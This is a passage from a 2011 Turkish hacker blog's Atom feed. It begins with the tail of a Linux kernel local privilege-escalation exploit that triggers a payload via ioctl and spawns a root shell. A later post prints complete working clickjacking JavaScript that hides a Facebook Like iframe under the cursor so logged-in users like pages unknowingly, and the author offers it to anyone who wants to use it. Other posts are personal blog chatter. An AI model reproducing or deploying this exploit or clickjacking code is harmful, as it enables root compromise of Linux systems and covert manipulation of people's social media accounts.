/&gt;&lt;br /&gt;        sleep(1);&lt;br /&gt;&lt;br /&gt;        printf("[*] Triggering payload...\n");&lt;br /&gt;        ioctl(fildes[2], 0, NULL);&lt;br /&gt;&lt;br /&gt;        if(getuid()) {&lt;br /&gt;                printf("[*] Exploit failed to get root.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        printf("[*] Got root!\n");&lt;br /&gt;        execl("/bin/sh", "/bin/sh", NULL);&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;pre&gt;Bu yazı &lt;a href="http://frewals.blogspot.com/"&gt;FreWaL&lt;/a&gt; Tarafından yazılmıştır.&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-3723289940023563931?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/3723289940023563931/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/linux-kernel-local-address-limit.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3723289940023563931'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3723289940023563931'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/linux-kernel-local-address-limit.html' title='Linux Kernel Local Address Limit Override Security Weakness'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-2439917703452629523</id><published>2011-05-17T02:47:00.000-07:00</published><updated>2011-05-17T02:51:32.730-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='frewal blog'/><category scheme='http://www.blogger.com/atom/ns#' term='FreWaL'/><title type='text'>Hiç Yazasım yok</title><content type='html'>Eskiden olsa Blogu sırf bilinmeyenlerle doldururdum. Ama gelin görünki hiç yazasım yok . Zira geçmiş senelerde sırf yayınladığım videolar ve kendime has yazılımlarım ile blogum ön plana çıkmıştı . Çünkü hiç bilinmeyen yöntemleri görsel anlatımlarla okuyucu arkadaslarımıza öretiyorduk . Kullanıcıların işlerini kolaylaştıracak yazılımlarım ile de pc üzerindeki bazı işlerin pratikliğini arttırıyorduk. Şuan bakıyorumda internet ortamı büyük bir tiyatro gibi içersinde bi sürü palyaço şaklabanlık yapıyor ( sözüm ona kimse üzerine alınmasın çakma hekırlardan bahsediyorum ) neyseki bizim hek hukla işimiz yok . Ayrıca bloguda yeni açtım bilen yok . Nasılsa yakında google amca nike göre üst sıralara çekmeye baslar . Ama blogumda sırf damar takılmaya kararlıyım desem yeridir .&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Mobile ile bloga yamak ayrıca zor oluyor belirtmem gerek :).&lt;br /&gt;&lt;br /&gt;İlerde bir gün (melankolik) takılmadığım bir önemde görüşmek dileği ile.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-2439917703452629523?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/2439917703452629523/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/hic-yazasm-yok.html#comment-form' title='3 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2439917703452629523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2439917703452629523'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/hic-yazasm-yok.html' title='Hiç Yazasım yok'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-3084915633385277501</id><published>2011-05-15T11:20:00.000-07:00</published><updated>2011-05-20T16:56:58.293-07:00</updated><title type='text'>Facebook Like Bug ( Clickjacking )</title><content type='html'>Çok uzun zamandır takip ettiğim bir dil ajax . Geçmiş seneleri bilenler bilir 2005 yılında googlenin suggest hizmeti ile kendini topluma tanıtmış bir dil olarak biliniyor. İnceliklerine bakıldığı zaman Çok muhteşem bir dil . Her ne kadar coderlerin işine yarasada kötü amaçlarada hizmet etmiyor değil . Zira gelişmişlik açısından ciddi manada şaşırta bilen bir yapıya sahip .&lt;br /&gt;Clickjacking güvenlik açığı geçtiğimiz yıllarda ortaya ilk atıldığı zamanlarda hakkında epey bi döküman okumuştum . ( Merak meselesi )&lt;br /&gt;Eric Kerr adında bir arkadaş ajaxın nimetlerini kullanarak facebook kullanıcısının oturumunun aktif olduğu browserlerde şahsa grupları arka planda beyendirtmeyi başarmış. Ancak kodlarda ufak bir yer gözüme çarptı&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;if (!IE) document.captureEvents(Event.MOUSEMOVE);&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: white;"&gt;Arkadaş şart koşmuş ve demişki Browser internet explorer dışında bir browser ise bu işlemi yap değil ise dön git köyüne.Anlayacağınız IE de çalışmıyor. Daha inceleme fırsatı bulamadım kullanmak isteyen olursa diye yayınlıyorum http://erickerr.com/like-clickjacking yine elemanın kendi sitesinden inceleyebilirsiniz.&lt;/div&gt;&lt;div style="color: white;"&gt;&lt;br /&gt;&lt;a href="http://erickerr.com/misc/like-clickjacking.js"&gt;http://erickerr.com/misc/like-clickjacking.js&lt;/a&gt;&lt;/div&gt;&lt;span style="color: black;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;(function(){&lt;br /&gt;  var tempX = 0,&lt;br /&gt;  tempY = 0,&lt;br /&gt;  IE = document.all ? true : false;&lt;br /&gt;  &lt;br /&gt;  if (!IE) document.captureEvents(Event.MOUSEMOVE);&lt;br /&gt;  &lt;br /&gt;  var like = document.createElement('iframe');&lt;br /&gt;  like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://erickerr.com/like-clickjacking') + '&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=53&amp;amp;action=like&amp;amp;colorscheme=light&amp;amp;height=80';&lt;br /&gt;  like.scrolling = 'no';&lt;br /&gt;  like.frameBorder = 0;&lt;br /&gt;  like.allowTransparency = 'true';&lt;br /&gt;  like.style.border = 0;&lt;br /&gt;  like.style.overflow = 'hidden';&lt;br /&gt;  like.style.cursor = 'pointer';&lt;br /&gt;  like.style.width = '53px';&lt;br /&gt;  like.style.height =  '23px';&lt;br /&gt;  like.style.position = 'absolute';&lt;br /&gt;  like.style.opacity = .8; //Would be 0 if really used&lt;br /&gt;  document.getElementsByTagName('body')[0].appendChild(like);&lt;br /&gt;  &lt;br /&gt;  window.addEventListener('mousemove', mouseMove, false);&lt;br /&gt;  &lt;br /&gt;  setTimeout(function(){&lt;br /&gt;    document.getElementsByTagName('body')[0].removeChild(like);&lt;br /&gt;    window.removeEventListener('mousemove', mouseMove, false);&lt;br /&gt;  }, 10000);&lt;br /&gt;  &lt;br /&gt;  function mouseMove(e) {&lt;br /&gt;    if (IE) {&lt;br /&gt;      tempX = event.clientX + document.body.scrollLeft;&lt;br /&gt;      tempY = event.clientY + document.body.scrollTop;&lt;br /&gt;    } else {&lt;br /&gt;      tempX = e.pageX;&lt;br /&gt;      tempY = e.pageY;&lt;br /&gt;    }&lt;br /&gt;    &lt;br /&gt;    if (tempX &lt; 0) tempX = 0;&lt;br /&gt;    if (tempY &lt; 0) tempY = 0;&lt;br /&gt;    &lt;br /&gt;    like.style.top = (tempY - 8) + 'px';&lt;br /&gt;    like.style.left = (tempX - 25) + 'px';&lt;br /&gt;    &lt;br /&gt;    return true&lt;br /&gt;  }&lt;br /&gt;})();&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-3084915633385277501?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/3084915633385277501/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/ajax-ckt-mertlik-bozuldu-facebook-like.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3084915633385277501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3084915633385277501'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/ajax-ckt-mertlik-bozuldu-facebook-like.html' title='Facebook Like Bug ( Clickjacking )'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4801596135070575967</id><published>2011-05-15T10:42:00.000-07:00</published><updated>2011-05-17T02:49:28.135-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='frewal blog'/><category scheme='http://www.blogger.com/atom/ns#' term='FreWaL'/><title type='text'>Farklı sitelerdeki FreWaL Üyelikleri ile alakalı</title><content type='html'>Geçtiğimiz günlerde googlede arama yaparken çakmalarıma rastladım o yüzden bu açıklamayı yapma gereği duyuyorum . IMHATIMI.ORG ve 1 , 2 dostum dışındaki hiç bir sitede üyeliğim bulunmamaktadır. Bir kaç sitede Adıma açılan saçma sapan 3 site hekid 1 site çekid konuları ile ağım bağım bulunmamaktadır .&lt;br /&gt;&lt;br /&gt;Taklitlerden sakınmak lazım.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4801596135070575967?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4801596135070575967/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/farkl-sitelerdeki-frewal-uyelikleri-ile.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4801596135070575967'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4801596135070575967'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/farkl-sitelerdeki-frewal-uyelikleri-ile.html' title='Farklı sitelerdeki FreWaL Üyelikleri ile alakalı'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-1292358282112851398</id><published>2011-05-15T05:05:00.000-07:00</published><updated>2011-05-17T02:48:40.174-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='frewal blog'/><category scheme='http://www.blogger.com/atom/ns#' term='FreWaL'/><title type='text'>Bloglama zamanı gelmiş geçiyor ...</title><content type='html'>Malumunuzda daha önceden frewal.net üzerinden bloglama işlemi yapıyordum Gelin görünki 2007 , 2008 den sora bloglamaya ara verdim . 2009 sonlarında frewal.net i bir daha aktif ettim 6 ay sora sıkılıp kapadım . O zamandan bana kalan http://web.archive.org/*/http://www.frewal.net sadece bu oldu. Şimdi yeni nesil blogger açalım dedik dursun bir köşede estikçe kafama karalarım bişiler :) . Selametle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-1292358282112851398?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/1292358282112851398/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/bloglama-zaman-gelmis-geciyor.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1292358282112851398'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1292358282112851398'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/bloglama-zaman-gelmis-geciyor.html' title='Bloglama zamanı gelmiş geçiyor ...'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>1</thr:total></entry></feed>
